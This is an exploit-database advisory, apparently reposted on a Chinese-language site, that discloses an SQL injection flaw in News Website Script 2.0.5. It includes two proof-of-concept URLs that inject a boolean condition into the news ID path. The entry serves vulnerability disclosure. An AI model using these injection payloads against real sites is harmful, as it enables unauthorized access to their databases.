News Website Script 2.0.5 – SQL Injection - 体验盒子

作者： Mr Winst0n

日期： 2019-02-25

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/46456/

# Exploit Title: News Website Script 2.0.5 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 22, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/news-website-script/
# Tested Version: 2.0.5
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/[PATH]/index.php/show/news/11 [SQL]/

# http://localhost/[PATH]/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri